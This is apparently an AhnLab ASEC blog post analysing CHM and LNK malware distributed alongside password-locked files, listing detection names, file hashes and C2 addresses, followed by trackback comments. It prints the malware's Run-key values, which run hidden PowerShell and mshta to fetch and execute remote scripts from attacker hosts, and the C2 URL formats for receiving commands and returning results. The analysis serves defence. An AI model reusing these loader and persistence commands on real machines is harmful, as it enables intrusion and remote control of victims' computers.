Malware Distributed Disguised as a Password File

AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file and being distributed alongside a normal file within a compressed file last month. It is difficult for users to notice that this file is malicious because this type of malware is distributed together with a normal file. The recently discovered malware was in CHM and LNK file formats. In the case of the CHM file, it shares the same type as the malware covered in the below post and is assumed to have been created by the same threat group.

It is believed that the CHM and LNK files are distributed while compressed together with a normal, password-locked file. Users are led to execute the CHM or LNK files since they appear as if they hold the passwords for the password-protected Excel and HWP files.

Figure 1. Inside the compressed files

While the two types were distributed in the same format, the malicious behaviors ultimately executed suggest that they were created by different groups.

  • CHM Type

Executing passwd.chm or Password.chm, as shown in Figure 1, displays the password to the locked file and simultaneously triggers the execution of the malicious script they contain.

Figure 2. Help screen displayed when passwd.chm is executed

Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file

Figure 4. Help screen displayed when Password.chm is executed

Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file

Below is an example of the malicious script found in the CHM files. Using the mshta process, it triggers the execution of an additional script that exists within a malicious URL.

Figure 6. Malicious script within the CHM file

The additional script run through the mshta process is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script is responsible for registering to the RUN key, receiving commands from the threat actor’s server, and transmitting the command execution results.

Figure 7. Malicious script found within 1.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
  • C2
    Receives threat actor’s commands – hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]

Figure 8. Malicious script found within 11.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: aeF
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
  • C2
    Receives threat actor’s commands – hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
  • LNK Type

The password.txt.lnk file shown in Figure 1 creates a text file containing the password and the malicious script file in the %temp% folder when executed.

Figure 9. Additional script and password.txt file that is created

Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file

As shown below, the VBS file is responsible for running the additional malicious script that exists within hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.

Figure 11. Created VBS file

Looking at the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.

This type of malware can perform a variety of malicious behaviors according to the threat actor’s intentions. Furthermore, since various other threat groups are utilizing this method of distributing malware alongside a normal file, the team predicts there are other forms of this malware aside from the CHM and LNK files that have already been confirmed. As shown above, since various forms of malware are being distributed to Korean users, users are advised to always check the sender of the emails they receive and be especially cautious about opening attached files.

[File Detection]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)

[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK

C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
Subscribe
Notify of
guest

15 Comments
Inline Feedbacks
View all comments
trackback

[…] post Malware Distributed Disguised as a Password File appeared first on ASEC […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] on a number of experiences from AhnLab Safety Emergency response Middle (ASEC), SEKOIA.IO, and Zscaler, the event is illustrative of the group’s steady efforts to refine […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] line with a number of studies from AhnLab Safety Emergency response Heart (ASEC), SEKOIA.IO, and Zscaler, the event is illustrative of the group’s steady efforts to refine […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] Malware Distributed Disguised as a Password File […]

trackback

[…] Malware Distributed Disguised as a Password File […]

trackback

[…] Malware Distributed Disguised as a Password File […]

trackback

[…] actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case covered back in March, “Malware Distributed Disguised as a Password File” [2], it is assumed that targets were approached via spear phishing emails with a normal […]

trackback

[…] actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case covered back in March, “Malware Distributed Disguised as a Password File” [2], it is assumed that targets were approached via spear phishing emails with a normal […]

trackback

[…] to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group’s continuous efforts […]

trackback

[…] malware’s operation method and C2 format are similar to those in previously published posts, [1] [2] allowing us to assume that the same threat actor is behind this […]